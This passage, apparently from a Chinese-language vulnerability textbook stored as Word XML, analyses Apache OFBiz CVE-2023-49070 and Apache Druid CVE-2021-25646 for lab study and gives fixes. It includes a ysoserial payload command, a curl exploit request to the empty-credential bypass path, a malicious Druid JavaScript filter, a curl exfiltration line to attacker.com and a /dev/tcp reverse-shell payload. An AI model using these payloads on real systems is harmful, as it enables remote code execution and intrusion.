      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t>OFBiz的类路径中包含commons-beanutils库，攻击者可使用ysoserial的CommonsBeanutils1 Gadget链生成序列化Payload。该Gadget链通过TemplatesImpl动态加载恶意字节码，在反序列化时调用newTransformer()触发命令执行，不依赖commons-collections库，适用范围更广。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05AB4004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# 使用ysoserial生成Payload</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>java -jar ysoserial.jar CommonsBeanutils1 "touch /tmp/success" | base64 | tr -d "\n"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# 将输出的Base64字符串填入XML的&lt;serializable&gt;标签中</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15C39360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（5）漏洞根因总结</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AF98D04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lastRenderedPageBreak/>
        <w:t>该漏洞是一个典型的"修复不彻底导致绕过"案例。CVE-2020-9496的</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>修复仅</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>在接口入口增加了密码校验，但校验逻辑存在空凭证绕过的缺陷；而XMLRPC反序列化的根本问题（信任用户传入的序列化数据）并未被解决。CVE-2023-49070通过空凭证绕过访问控制后，仍然利用同一个反序列化点实现RCE。官方最终在18.12.10版本中彻底删除了</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>xmlrpc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>接口，才从根本上消除了该类漏洞。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22A37C57" w14:textId="77777777" w:rsidR="00DD3943" w:rsidRDefault="001369D1">
      <w:pPr>
        <w:pStyle w:val="21"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">7.4 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>实验环境</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="74E5DDAF" w14:textId="77777777" w:rsidR="00DD3943" w:rsidRDefault="001369D1">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t>靶机：Vulhub OFBiz CVE-2023-49070环境，HTTPS端口8443</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="317678BD" w14:textId="77777777" w:rsidR="00DD3943" w:rsidRDefault="001369D1">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t>攻击机：Kali Linux，安装ysoserial、curl</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2902AF5F" w14:textId="77777777" w:rsidR="00DD3943" w:rsidRDefault="001369D1">
      <w:pPr>
        <w:pStyle w:val="21"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">7.5 </w:t>
      </w:r>
      <w:r>
        <w:t>漏洞复现步骤</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="670E98A4" w14:textId="77777777" w:rsidR="00DD3943" w:rsidRDefault="001369D1">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体"/>
          <w:b/>
        </w:rPr>
        <w:t>步骤一：生成序列化Payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3602B035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java -jar ysoserial.jar CommonsBeanutils1 "touch /tmp/ofbiz-success" | base64 | tr -d "\n"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="202EB8EC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步骤二：构造并发送恶意请求</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B78FD24" w14:textId="77777777" w:rsidR="00DD3943" w:rsidRDefault="001369D1">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">将Base64 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Payload填入XML，发送到绕过路径</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B942BE4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-k -X POST "https://192.168.1.100:8443/webtools/control/xmlrpc/?USERNAME=&amp;PASSWORD=&amp;requirePasswordChange=Y" \</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">  -H "Content-Type: application/xml" \</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">  -d @payload.xml</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E648D30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步骤三：验证命令执行</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22894F98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进入</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>OFBiz</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>容器，检查/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>tmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>目录：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08BF3617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docker compose exec web bash</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>ls -l /tmp/ofbiz-success</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A8AC8DA" w14:textId="77777777" w:rsidR="00DD3943" w:rsidRDefault="001369D1">
      <w:pPr>
        <w:pStyle w:val="21"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">7.6 </w:t>
      </w:r>
      <w:r>
        <w:t>修复建议</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29482B63" w14:textId="77777777" w:rsidR="00DD3943" w:rsidRDefault="001369D1">
      <w:r>
        <w:t>① 升级至Apache OFBiz 18.12.10及以上版本，该版本彻底删除了xmlrpc接口。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50B546C9" w14:textId="77777777" w:rsidR="00DD3943" w:rsidRDefault="001369D1">
      <w:r>
        <w:t>② 若无法立即升级，可通过Web服务器（如Nginx）配置访问控制，禁止外部访问/webtools/control/xmlrpc路径。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55697458" w14:textId="77777777" w:rsidR="00DD3943" w:rsidRDefault="001369D1">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>③ 修复密码校验逻辑，禁止空用户名和空密码通过校验。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49A14051" w14:textId="77777777" w:rsidR="00DD3943" w:rsidRDefault="001369D1">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>④ 在JVM启动参数中配置反序列化过滤器（-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Djdk.serialFilter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>），限制可反序列化</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>的类白名单</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A2D2FED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42948265" w14:textId="77777777" w:rsidR="00DD3943" w:rsidRDefault="001369D1">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>第八章</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">  Apache</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Druid </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>嵌入式</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> RCE</w:t>
      </w:r>
      <w:r>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:t>CVE-2021-25646</w:t>
      </w:r>
      <w:r>
        <w:t>）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="565B3ABA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8.1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>漏洞概述</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04E8C9D7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Apache Druid是Apache基金会旗下的开源分布式列存储系统，专为大规模实时数据分析设计，提供低延迟的数据摄取与查询能力。Druid支持在多种请求中嵌入用户提供的JavaScript代码，用于数据转换、过滤和聚合等操作。该功能默认禁用，仅适用于高信任度环境。但在Druid 0.20.0及以前版本中，攻击者可通过构造特殊的JSON请求，利用Jackson反序列化的特性覆盖JavaScript功能的全局禁用配置，强制开启JavaScript执行，进而调用Java API执行任意系统命令。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7193EF88" w14:textId="77777777" w:rsidR="00DD3943" w:rsidRDefault="001369D1">
      <w:pPr>
        <w:pStyle w:val="21"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">8.2 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>影响版本</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="5359179C" w14:textId="77777777" w:rsidR="00DD3943" w:rsidRDefault="001369D1">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t>Apache Druid &lt; 0.20.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BEBA865" w14:textId="77777777" w:rsidR="00DD3943" w:rsidRDefault="001369D1">
      <w:pPr>
        <w:pStyle w:val="21"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">8.3 </w:t>
      </w:r>
      <w:r>
        <w:t>代码级成因剖析</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AA7F3AC" w14:textId="77777777" w:rsidR="00DD3943" w:rsidRDefault="001369D1">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体"/>
          <w:b/>
        </w:rPr>
        <w:t>（1）JavaScript功能的全局开关</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="583BE42D" w14:textId="77777777" w:rsidR="00DD3943" w:rsidRDefault="001369D1">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t>Druid通过JavaScriptConfig类管理JavaScript功能的启用状态。该类有一个enabled布尔字段，默认值为false，表示禁止执行用户提供的JavaScript代码。在正常情况下，即使用户在请求中指定了type为javascript的过滤器或转换函数，Druid也会因为JavaScriptConfig.isEnabled()返回false而拒绝执行。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CAD7242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JavaScriptConfig 类（简化示意）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>public class JavaScriptConfig {</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    private boolean enabled = false;  // 默认禁用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 xml:space="preserve">    public boolean isEnabled() {</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">        return enabled;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// JavaScriptDimFilter 中的校验逻辑</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>public void makeByteBuffer(...) {</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    if (!JavaScriptConfig.getInstance().isEnabled()) {</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">        throw new IAE("JavaScript is disabled");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 xml:space="preserve">    // 执行JavaScript代码...</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="750514A2" w14:textId="77777777" w:rsidR="00DD3943" w:rsidRDefault="001369D1">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体"/>
          <w:b/>
        </w:rPr>
        <w:t>（2）Jackson反序列化与空字符串键</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EF56FB4" w14:textId="77777777" w:rsidR="00DD3943" w:rsidRDefault="001369D1">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>Druid使用Jackson库将HTTP</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>请求的JSON体反序列化为Java对象</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>漏洞的关键在于：当JSON中出现一个键为空字符串""的字段时，Jackson会将该字段的值注入到当前对</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>象的"默认配置对象"中。具体到JavaScript过滤器的反序列化，空字符串键对应的是</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>JavaScriptConfig</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>对象。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08CB391E" w14:textId="77777777" w:rsidR="00DD3943" w:rsidRDefault="001369D1">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        <w:spacing w:before="80" w:after="80"/>
        <w:ind w:left="283"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>// 攻击者构造的恶意JSON片段</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:br/>
        <w:t>"filter": {</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    "type": "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>javascript</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>",</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    "function": "function(value){return </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>java.lang.Runtime.getRuntime</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>().exec('id')}",</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    "dimension": "added",</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    "": {</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">        "enabled": "true"   // </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>空字符串键</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> -&gt; 注入到</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>JavaScriptConfig</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="775AD683" w14:textId="77777777" w:rsidR="00DD3943" w:rsidRDefault="001369D1">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>当Jackson反序列化这个JSON时，它会：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72E45CA4" w14:textId="77777777" w:rsidR="00DD3943" w:rsidRDefault="001369D1">
      <w:r>
        <w:t xml:space="preserve">① </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>将type、function、dimension等字段正常设置到JavaScriptDimFilter对象</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DC305ED" w14:textId="77777777" w:rsidR="00DD3943" w:rsidRDefault="001369D1">
      <w:r>
        <w:t>② 遇到空字符串键""时，将其值{"enabled": "true"}反序列化为JavaScriptConfig对象，并通过某种方式（如@JacksonInject或默认属性注入）覆盖全局的JavaScriptConfig实例，将enabled设置为true。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DC722CB" w14:textId="77777777" w:rsidR="00DD3943" w:rsidRDefault="001369D1">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t>这样，原本全局禁用的JavaScript功能在本次请求中被"局部开启"，攻击者提供的JavaScript代码得以执行。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B8ED3CF" w14:textId="77777777" w:rsidR="00DD3943" w:rsidRDefault="001369D1">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体"/>
          <w:b/>
        </w:rPr>
        <w:t>（3）JavaScript调用Java执行命令</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11609507" w14:textId="77777777" w:rsidR="00DD3943" w:rsidRDefault="001369D1">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t>Druid使用Mozilla Rhino或Nashorn作为JavaScript引擎。这些引擎支持JavaScript直接访问Java类和方法。攻击者在function中调用java.lang.Runtime.getRuntime().exec()即可执行系统命令：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4141E571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命令执行Payload</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>"function": "function(value){return java.lang.Runtime.getRuntime().exec('curl http://attacker.com/`id`')}"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// 反弹Shell Payload</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>"function": "function(value){java.lang.Runtime.getRuntime().exec('/bin/bash -c $@|bash 0 echo bash -i &gt;/dev/tcp/192.168.1.200/1234 0&gt;&amp;1')}"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="180BE6DC" w14:textId="77777777" w:rsidR="00DD3943" w:rsidRDefault="001369D1">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体"/>
          <w:b/>
        </w:rPr>
        <w:t>（4）触发接口：/druid/indexer/v1/sampler</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BA4525A" w14:textId="77777777" w:rsidR="00DD3943" w:rsidRDefault="001369D1">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>该漏洞通常通过Druid Console的"Load data -&gt; Local disk"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>功能触发。该功能在后台调用</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/druid/indexer/v1/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sampler接口对数据进行采样预览</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>攻击者在浏览器中正常操作到添加过滤器步骤，然后用Burp Suite拦截请求，将filter字段修改为恶意的</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>javascript</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>类型，即可触发漏洞。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09F804AA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（5）漏洞根因总结</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AD7A98E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lastRenderedPageBreak/>
        <w:t>该漏洞的根因是Jackson反序列化过程中，</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>空字符串键可以</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>被用来注入和覆盖全局配置对象。Druid的开发者假设</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>JavaScriptConfig</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>是全局</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>单例且</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>不可被请求修改，但Jackson的反序列化行为打破了这一假设，使得攻击者可以在单次请求中临时开启JavaScript执行功能。本质上属于"配置覆盖导致的安全机制绕过"。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E905E1E" w14:textId="77777777" w:rsidR="00DD3943" w:rsidRDefault="001369D1">
      <w:pPr>
        <w:pStyle w:val="21"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">8.4 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>实验环境</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53775AD9" w14:textId="77777777" w:rsidR="00DD3943" w:rsidRDefault="001369D1">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>靶机：Vulhub</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Druid CVE-2021-25646环境，Console端口8888</w:t>
      </w:r>
    </w:p>
